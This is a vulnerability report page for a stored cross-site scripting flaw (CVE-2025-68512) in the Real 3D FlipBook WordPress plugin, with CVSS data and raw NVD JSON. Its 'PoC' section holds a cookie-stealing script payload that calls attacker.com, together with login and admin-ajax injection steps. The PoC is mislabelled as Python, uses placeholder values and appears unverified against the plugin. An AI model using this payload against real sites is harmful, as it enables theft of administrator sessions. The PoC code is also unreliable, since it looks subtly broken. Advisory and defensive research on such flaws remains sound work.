Security Vulnerability Report
中文
CVE-2025-68512 CVSS 6.5 MEDIUM

CVE-2025-68512

Published: 2025-12-24 13:16:21
Last Modified: 2026-04-27 19:16:27

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in creativeinteractivemedia Real 3D FlipBook real3d-flipbook-lite allows Stored XSS.This issue affects Real 3D FlipBook: from n/a through <= 4.11.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Real 3D FlipBook (real3d-flipbook-lite) <= 4.11.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-68512 Stored XSS PoC for Real 3D FlipBook // This PoC demonstrates how to exploit the stored XSS vulnerability // Prerequisites: WordPress account with low privileges (subscriber role) const payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'; // Step 1: Login to WordPress with low privilege account fetch('https://target-site.com/wp-login.php', { method: 'POST', body: new URLSearchParams({ 'log': 'attacker_username', 'pwd': 'attacker_password', 'wp-submit': 'Log In' }) }); // Step 2: Create or edit a flipbook with XSS payload in title/description fetch('https://target-site.com/wp-admin/admin-ajax.php', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: new URLSearchParams({ 'action': 'real3dflipbook_save_book', 'title': payload, 'description': payload, 'security': 'nonce_value_here' }) }); // Step 3: When admin views the book, cookie will be sent to attacker // The XSS payload executes in admin's browser context console.log('XSS payload sent');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68512", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:21.020", "lastModified": "2026-04-27T19:16:26.860", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in creativeinteractivemedia Real 3D FlipBook real3d-flipbook-lite allows Stored XSS.This issue affects Real 3D FlipBook: from n/a through <= 4.11.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/real3d-flipbook-lite/vulnerability/wordpress-real-3d-flipbook-plugin-4-11-4-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}